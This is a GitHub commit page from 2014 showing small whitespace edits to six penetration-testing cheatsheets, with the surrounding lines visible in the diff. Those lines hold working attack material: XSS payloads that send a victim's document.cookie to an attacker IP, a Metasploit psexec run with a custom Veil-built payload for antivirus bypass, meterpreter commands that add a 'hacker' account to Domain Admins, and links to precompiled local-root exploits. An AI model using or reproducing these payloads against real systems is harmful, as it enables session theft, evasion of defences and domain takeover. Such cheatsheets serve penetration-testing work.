Skip to content

Commit

Permalink
Cheatsheets
Browse files Browse the repository at this point in the history
Modified Cheatsheets
  • Loading branch information
1nPr0c committed Sep 11, 2014
1 parent 95f0350 commit 46ef4f0
Show file tree
Hide file tree
Showing 6 changed files with 6 additions and 10 deletions.
2 changes: 1 addition & 1 deletion Cheatsheet_AVBypass.txt
Original file line number Diff line number Diff line change
Expand Up @@ -11,4 +11,4 @@ msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit
msf exploit(psexec) > exploit
4 changes: 1 addition & 3 deletions Cheatsheet_ApacheSSL.txt
Original file line number Diff line number Diff line change
Expand Up @@ -37,6 +37,4 @@ More information:
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server


http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
4 changes: 1 addition & 3 deletions Cheatsheet_CookieStealing.txt
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,4 @@ python -m SimpleHTTPServer 80
[-] Use one of the following XSS payloads:

<script>document.location="http://192.168.0.60/?c="+document.cookie;</script>
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>


<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>
2 changes: 1 addition & 1 deletion Cheatsheet_DomainAdminExploitation.txt
Original file line number Diff line number Diff line change
Expand Up @@ -27,4 +27,4 @@ meterpreter > shell
C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
2 changes: 1 addition & 1 deletion Cheatsheet_LinuxPrivilegeEsc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -378,4 +378,4 @@ http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
2 changes: 1 addition & 1 deletion Cheatsheet_PenTesting.txt
Original file line number Diff line number Diff line change
Expand Up @@ -370,4 +370,4 @@ atftpd --daemon --port 69 /tmp

[+] Connect to TFTP Server
tftp 192.168.0.10
put / get files
put / get files

0 comments on commit 46ef4f0

Please sign in to comment.